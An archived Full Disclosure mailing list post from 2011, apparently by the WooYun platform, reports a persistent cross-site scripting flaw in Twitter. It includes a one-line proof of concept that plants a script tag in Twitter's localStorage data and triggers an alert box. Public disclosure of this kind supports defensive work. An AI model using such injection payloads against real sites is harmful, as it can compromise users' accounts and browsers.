Full Disclosure mailing list archives
A persistent xss on twitter,another xss rootkit
From: WooYun <root () wooyun org>
Date: Tue, 25 Oct 2011 00:25:48 +0800
Hi someone report a persistent xss about twitter on wooyun http://www.wooyun.org/bugs/wooyun-2010-03075 just put on some magic code like this localStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}'); :)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- A persistent xss on twitter,another xss rootkit WooYun (Oct 24)